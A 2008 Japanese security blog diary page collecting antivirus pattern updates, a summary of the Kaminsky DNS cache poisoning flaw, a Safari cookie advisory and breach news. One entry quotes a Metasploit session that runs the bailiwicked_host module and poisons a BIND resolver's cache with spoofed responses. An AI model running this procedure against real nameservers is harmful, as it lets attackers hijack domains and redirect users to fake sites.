Hatena::ブログ(Diary)

まっちゃだいふくの日記★とれんどふりーく★ このページをアンテナに追加 RSSフィード Twitter

カレンダー
<< 2008/07 >>
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31

このBlogは個人的に収集しているセキュリティ情報や製品情報について書いています。
各ウイルスバスターの不具合やBlogでの反応:クラウド(2015)クラウド(2014)クラウド(2013)201220112011続き201020092008
情報なし:20162017
日本の情報セキュリティ勉強会ポータルサイト

2008年07月24日(木曜日) 劇画の日

[][]パターンアップ-5.429.00

Trendmicroのパターンがアップしました。

パターン番号:5.429.00

イエローアラート:なし
アップデート理由:TROJ_FAKECLEAN.A緊急対応
新規対応
 緊急対応
  TROJ_FAKECLEAN.A
亜種対応
 イエロー
  TROJ_IFRAME.CP
  WORM_IMAUT.Q

screenshot


[][]DNS Cache Poisoningの概要と対処 (Dan KaminskyによるDNS脆弱性指摘に関して)(PDF)

(NTT情報流通プラットフォーム研究所)

セキュメモ経由

DNSキャッシュポイズニングについて、わかりやすい資料がNTT情報流通プラットフォーム研究所より出ています。

MSBINDパッチを出していますので早急に適用しましょう!!偽のサイトに誘導されますよ!

DNS Cache Poisoningの概要と対処

(Dan KaminskyによるDNS脆弱性指摘に関して)

http://www.nttv6.net/files/DKA-20080723.pdf

そういう問題だったのか!!!!

Cache Poisoning攻撃は以前から知られていたが,今回の攻撃によりDNS的にはRR Cache TTLが0秒になったのと同じ攻撃が可能になった

  • 仮に1000qps(秒間1000回)の攻撃を許した場合
    • 約38分(2271秒)で毒入れ成功率は50%超
    • 約9時間(541分)で毒入れ成功率が100%超
      • 例えば,9時間程度攻撃され続けるとそのドメインは必ず乗っ取られてしまう
    • より高い攻撃レートでの攻撃を受ければ数十秒程度

でPoisoningされてしまうことも

screenshot


[][]spywareパターンアップ-0.671.00

Trendmicroのspywareパターンがアップしました。

パターン番号:0.671.00

アップデート理由:定期アップデート

screenshot


[][]ジュンク堂書店大阪本店 トークセッション情報

経由)

ぁ゛ーーーーーっ!まっちゃ445とかぶってしまった・・・・・・orz

裏で動いている友人に拍手!

技術評論社刊 『[24時間365日] サーバ/インフラを支える技術 〜スケーラビリティ、ハイパフォーマンス、省力運用』 刊行記念トークイベント

「私と技術書」

伊藤直也氏(株式会社はてな)

■日時 … 2008年8月23日(土)14:00〜 (13:30開場)

■会場 … 3階喫茶にて。入場料500円

■定員 … 40名

■3階東カウンターにて予約受付。電話予約可。 TEL 06-4799-1090

京都のIT企業「はてな」で活躍中のプログラマー伊藤直也氏が語る、技術書に関する思い出・翻訳執筆の裏話・おすすめの技術書など…普段のTechTalk とは一味違うトークセッションをお楽しみ下さい。

【講師紹介】

伊藤直也(いとうなおや)

1977年宮城県生まれ、秋田県出身。青山学院大学大学院理工学研究科博士課程前期修了。

2004年9月に株式会社はてなに入社。執行役員 最高技術責任者(CTO)。

404 Not Found

screenshot


[][]ブログ記事から年齢や性別が分かる!? gooが「ブログ通信簿」公開:ITpro

Gooラボ面白いこといろいろやってるなぁ。

NTTレゾナントは2008年7月23日、ブログ記事の内容などを分析して、執筆者の性別や年齢、ブログの影響度などを自動的に推定するサービスブログ通信簿」を公開した。通信簿には、「生徒会長タイプ」「一般生徒タイプ」といった執筆者のタイプや、適性のありそうな職業なども提示する。ポータルサイトgoo」に設けている実験サイトgooラボ」にて公開する。

ログインしてください:日経 xTECH(クロステック)

f:id:ripjyr:20080724141313p:image

screenshot


[][]「1億円では高かった」SAPがハード込みで3000万円からの新サービス:ITpro

最短と現実・・・・まぁ1憶は高いよねぇ、3000万で全部コミコミならまだ、安いかなぁ…

SAPジャパンは2008年7月23日、売上高50〜200億円の中堅中小企業向けにERP(統合基幹業務システム)パッケージの新たな導入支援サービスを提供すると発表した。財務会計、管理会計、購買/在庫、販売、生産、プロジェクト管理の各機能をハードウエア込みで「価格は3000万円から、導入期間は最低8週間と、低価格・短期導入を実現できることが特徴だ」

「1億円では高かった」SAPがハード込みで3000万円からの新サービス | 日経 xTECH(クロステック)

screenshot


[][]BIND 9.4.1-9.4.2 Remote DNS Cache Poisoning Flaw Exploit (meta)

DNSキャッシュ脆弱性Exploitが出ていますねぇ。

msf auxiliary(bailiwicked_host) > set SRCPORT 0

SRCPORT => 0

msf auxiliary(bailiwicked_host) > run

[*] Switching to target port 48178 based on Metasploit service

[*] Targeting nameserver A.B.C.D

[*] Querying recon nameserver for example.com.'s nameservers...

[*] Got answer with 2 answers, 0 authorities

[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.

[*] Querying recon nameserver for address of ns89.worldnic.com....

[*] Got answer with 1 answers, 0 authorities

[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45

[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com....

[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as

[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.

[*] Querying recon nameserver for address of ns90.worldnic.com....

[*] Got answer with 1 answers, 0 authorities

[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45

[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com....

[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as

[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178...

[*] Sent 1000 queries and 20000 spoofed responses...

[*] Sent 2000 queries and 40000 spoofed responses...

[*] Sent 3000 queries and 60000 spoofed responses...

[*] Sent 4000 queries and 80000 spoofed responses...

[*] Sent 5000 queries and 100000 spoofed responses...

[*] Sent 6000 queries and 120000 spoofed responses...

[*] Sent 7000 queries and 140000 spoofed responses...

[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7

[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_host) >

msf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D

[*] exec: nslookup pwned.example.com A.B.C.D

no title

screenshot


[][]Apple Safari Cross-Domain Cookie Injection Vulnerability - Calendar Of Updates

クッキーモンスターの問題がSafariで出てるって感じか?

A vulnerability has been discovered in Apple Safari, which can be exploited by malicious people to bypass certain security restrictions.

The problem is that websites are allowed to set cookies for certain country-specific secondary top-level domains. This can e.g. be exploited to fix a session by setting a known session ID in a cookie, which the browser sends to all web sites operating under an affected domain (e.g. co.uk, com.au).

The vulnerability is confirmed in Apple Safari for Windows 3.1.2. Other versions may also be affected.

How To Win The Lottery: Winning Lottery Numbers & Results

関連URL

screenshot


[][]ごっさん居眠り中: PC-9821Nr266、戦線復帰

テラナツカシス!!

最終的には、デスクトップはRa20(CPUCeleron 433MHzに換装したので、

実質的には「Ra433」みたいなもの)をファイルサーバとし利用、

そして、Nr266をメール専用機として利用、と、2台に絞り込まれました。

PC-9821Nr266、戦線復帰: ごっさん居眠り中

screenshot


[][]XP&Vistaの遅い・重いを解決(1)総論:XP&Vistaの遅い・重いを解決

これはひどい記事。Aeroを止めるのは良いとしてもUACをOFFにするのは最悪な選択

XPと比べて充実したセキュリティーも“ありがた迷惑”。ソフトを実行したりドライバーインストールするたびに、いちいち警告画面が出るのは非常にわずらわしい。そのうえ、セキュリティー機能が占めるメモリー使用量も決して小さくない。これも不要なときはオフにしてしまおう。

XP&Vistaの遅い・重いを解決(1)総論 | 日経 xTECH(クロステック)

screenshot


[][]2008-07-24 - into_the_blueの日記

大丈夫、エロい上司は週記と銘打って半年記だからwwwwwwwwwww

最近あまり日記書いてなくて、週記になりつつありそう・・・こりゃ上司に似たなw

intotheblueの日記

screenshot


[][]パターンアップ-5.427.00

Trendmicroのパターンがアップしました。

パターン番号:5.427.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 特筆なし
亜種対応
 イエロー
  WORM_IMAUT.Q

screenshot


[]

f:id:ripjyr:20080723084631j:image

なんとなく

f:id:ripjyr:20080723121706j:image

誰と無く

f:id:ripjyr:20080723121723j:image

f:id:ripjyr:20080721104849j:image

f:id:ripjyr:20080721175144j:image

f:id:ripjyr:20080723071631j:image

f:id:ripjyr:20080723071644j:image

f:id:ripjyr:20080723080153j:image


[][]IIJ、高画質動画配信サーバーソフトを独自開発

IIJが高画質動画配信サーバソフトを独自でかいはつしたそうです。

ソフトのコストを75%削減することも可能との事。

HD品質の動画をストリーミング配信するサービス「アクトビラ ビデオ・フル」では、従来の一般的なPC向け配信の4〜6倍程度の配信帯域(1端末あたり数Mbps)と、サーバーリソースを必要とし、視聴する会員数の増加に応じて増強が必要となるサーバーのコスト削減が課題になっていたという。今回の開発により、「今後1〜2年で見込まれるサーバーソフトのコストを75%以上削減することが可能」としている。

 また、アクトビラのコンテンツ配信プラットフォームを担うIIJが、ネットワークと配信サーバー運用から、配信用ソフトウェアの開発までを一貫してサポートすることで、障害時の復旧時間の短縮など、配信インフラの運用・保守レベルの向上を実現するという。

IIJ、高画質動画配信サーバーソフトを独自開発

screenshot


[][]アイリスプラザに不正アクセス、カード情報2万8105件流出か

アイリスプラザのページにSQLインジェクション攻撃がかけられて、個人情報が最大2万8千件流出したそうです。

収納、インテリア、ペット用品などを販売するアイリスプラザは23日、同社が運営するショッピングサイト不正アクセスを受け、過去に商品を購入した顧客のクレジットカード情報の一部が流出したことを明らかにした。中国経由のSQLインジェクション攻撃が原因だという。

 流出した可能性があるのは、2007年6月1日から2008年6月6日までに同サイトで商品を購入した顧客のクレジットカード情報最大2万8105件。うち、987件はクレジットカードの有効期限も含まれていた。氏名やメールアドレスなど個人を特定できる情報は、流出していないという。なお、同社はAmazon.co.jpYahoo!ショッピングにも店舗を出していたが、今回の情報流出の影響はないとしている。

アイリスプラザに不正アクセス、カード情報2万8105件流出か

最近やらなくなった、お礼500円とか1000円をやったそうです>アイリスプラザ

なお、今回の情報流出によって、クレジットカードの不正利用被害にあった顧客に対しては、金銭的な負担がかからないよう対応するとしている。また、過去に同サイトで商品を購入したり会員登録を行った顧客には、おわびとして1000円分のポイントを付与した。

アイリスプラザに不正アクセス、カード情報2万8105件流出か

screenshot


[][]asahi.com(朝日新聞社):京都・舞鶴で38.6度 この夏一番の暑さに - 社会

あつい、あつい、あつい、きょうとがあつい!

高気圧に覆われた列島は23日も厳しい暑さに見舞われた。特に近畿北部から北陸にかけては、山を越え乾いた暖かい風が吹き込む「フェーン現象」が起き、京都府舞鶴市で観測史上最高の38.6度を観測、この夏の全国での最高気温となった。

朝日新聞デジタル:どんなコンテンツをお探しですか?

screenshot


当ページでは、掲載内容による不具合、問題に関する責任もちません、内容が正確である保障もできません。m(__)m
各自の自己責任で、情報の確認をお願いします

毎日のトップに掲載されている今日の記念日は、MIEさんのページから頂いております。ありがとうございます。